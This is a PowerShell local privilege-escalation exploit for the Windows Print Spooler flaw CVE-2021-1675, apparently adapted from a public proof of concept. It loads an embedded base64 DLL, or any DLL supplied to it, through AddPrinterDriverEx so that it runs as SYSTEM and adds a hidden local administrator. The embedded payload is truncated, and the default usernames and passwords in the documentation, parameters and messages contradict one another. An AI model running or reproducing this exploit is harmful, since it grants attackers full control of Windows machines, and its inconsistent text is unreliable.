function Invoke-getadminuser
{
    <#
        .SYNOPSIS
        Exploits CVE-2021-1675 (Printgetadminuser)

        Authors:
            Caleb Stewart - https://github.com/calebstewart
            John Hammond - https://github.com/JohnHammond
        URL: https://github.com/calebstewart/CVE-2021-1675

        .DESCRIPTION
        Exploits CVE-2021-1675 (Printgetadminuser) locally to add a new local administrator
        user with a known password. Optionally, this can be used to execute your own
        custom DLL to execute any other code as NT AUTHORITY\SYSTEM.

        .PARAMETER DriverName
        The name of the new printer driver to add (default: "Totally Not Malicious")

        .PARAMETER NewUser
        The name of the new user to create when using the default DLL (default: "adm1n")

        .PARAMETER NewPassword
        The password for the new user when using the default DLL (default: "P@ssw0rd")

        .PARAMETER DLL
        The DLL to execute when loading the printer driver (default: a builtin payload which
        creates the specified user, and adds the new user to the local administrators group).

        .EXAMPLE
        > Invoke-getadminuser
        Adds a new local user named `adm1n` which is a member of the local admins group

        .EXAMPLE
        > Invoke-getadminuser -NewUser "caleb" -NewPassword "password" -DriverName "driver"
        Adds a new local user named `caleb` using a printer driver named `driver`

        .EXAMPLE
        > Invoke-getadminuser -DLL C:\path\to\

    #>
    param (
        [string]$DriverName = "Totally Not Malicious",
        [string]$NewUser = "",
        [string]$NewPassword = "",
        [string]$DLL = ""
    )

    if ( $DLL -eq "" ){
        $getadminuser_data = [byte[]](get_getadminuser_dll)
        $encoder = New-Object System.Text.UnicodeEncoding

        if ( $NewUser -ne "" ) {
            $NewUserBytes = $encoder.GetBytes($NewUser)
            [System.Buffer]::BlockCopy($NewUserBytes, 0, $getadminuser_data, 0x32e20, $NewUserBytes.Length)
            $getadminuser_data[0x32e20+$NewUserBytes.Length] = 0
            $getadminuser_data[0x32e20+$NewUserBytes.Length+1] = 0
        } else {
            Write-Host "[+] using default new user: dave2"
        }

        if ( $NewPassword -ne "" ) {
            $NewPasswordBytes = $encoder.GetBytes($NewPassword)
            [System.Buffer]::BlockCopy($NewPasswordBytes, 0, $getadminuser_data, 0x32c20, $NewPasswordBytes.Length)
            $getadminuser_data[0x32c20+$NewPasswordBytes.Length] = 0
            $getadminuser_data[0x32c20+$NewPasswordBytes.Length+1] = 0
        } else {
            Write-Host "[+] using default new password: password123!"
        }

        $DLL = [System.IO.Path]::GetTempPath() + "getadminuser.dll"
        [System.IO.File]::WriteAllBytes($DLL, $getadminuser_data)
        Write-Host "[+] created payload at $DLL"
        $delete_me = $true
    } else {
        Write-Host "[+] using user-supplied payload at $DLL"
        Write-Host "[!] ignoring NewUser and NewPassword arguments"
        $delete_me = $false
    }

    $Mod = New-InMemoryModule -ModuleName "A$(Get-Random)"

    $FunctionDefinitions = @(
      (func winspool.drv AddPrinterDriverEx ([bool]) @([string], [Uint32], [IntPtr], [Uint32]) -Charset Auto -SetLastError),
      (func winspool.drv EnumPrinterDrivers([bool]) @( [string], [string], [Uint32], [IntPtr], [UInt32], [Uint32].MakeByRefType(), [Uint32].MakeByRefType()) -Charset Auto -SetLastError)
    )

    $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Mod'

    # Define custom structures for types created
    $DRIVER_INFO_2 = struct $Mod DRIVER_INFO_2 @{
        cVersion = field 0 Uint64;
        pName = field 1 string -MarshalAs @("LPTStr");
        pEnvironment = field 2 string -MarshalAs @("LPTStr");
        pDriverPath = field 3 string -MarshalAs @("LPTStr");
        pDataFile = field 4 string -MarshalAs @("LPTStr");
        pConfigFile = field 5 string -MarshalAs @("LPTStr");
    }

    $winspool = $Types['winspool.drv']
    $APD_COPY_ALL_FILES = 0x00000004

    [Uint32]($cbNeeded) = 0
    [Uint32]($cReturned) = 0

    if ( $winspool::EnumPrinterDrivers($null, "Windows x64", 2, [IntPtr]::Zero, 0, [ref]$cbNeeded, [ref]$cReturned) ){
        Write-Host "[!] EnumPrinterDrivers should fail!"
        return
    }

    [IntPtr]$pAddr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([Uint32]($cbNeeded))

    if ( $winspool::EnumPrinterDrivers($null, "Windows x64", 2, $pAddr, $cbNeeded, [ref]$cbNeeded, [ref]$cReturned) ){
        $driver = [System.Runtime.InteropServices.Marshal]::PtrToStructure($pAddr, [System.Type]$DRIVER_INFO_2)
    } else {
        Write-Host "[!] failed to get current driver list"
        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($pAddr)
        return
    }

    Write-Host "[+] using pDriverPath = `"$($driver.pDriverPath)`""
    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($pAddr)

    $driver_info = New-Object $DRIVER_INFO_2
    $driver_info.cVersion = 3
    $driver_info.pConfigFile = $DLL
    $driver_info.pDataFile = $DLL
    $driver_info.pDriverPath = $driver.pDriverPath
    $driver_info.pEnvironment = "Windows x64"
    $driver_info.pName = $DriverName

    $pDriverInfo = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf($driver_info))
    [System.Runtime.InteropServices.Marshal]::StructureToPtr($driver_info, $pDriverInfo, $false)

    if ( $winspool::AddPrinterDriverEx($null, 2, $pDriverInfo, $APD_COPY_ALL_FILES -bor 0x10 -bor 0x8000) ) {
        if ( $delete_me ) {
            Write-Host "[+] added user $NewUser as local administrator"
        } else {
            Write-Host "[+] driver appears to have been loaded!"
        }
    } else {
        Write-Error "[!] AddPrinterDriverEx failed"
    }

    if ( $delete_me ) {
        Write-Host "[+] deleting payload from $DLL"
        Remove-Item -Force $DLL
    }
}

function get_getadminuser_dll
{
    $getadminuser_data = [System.Convert]::FromBase64String("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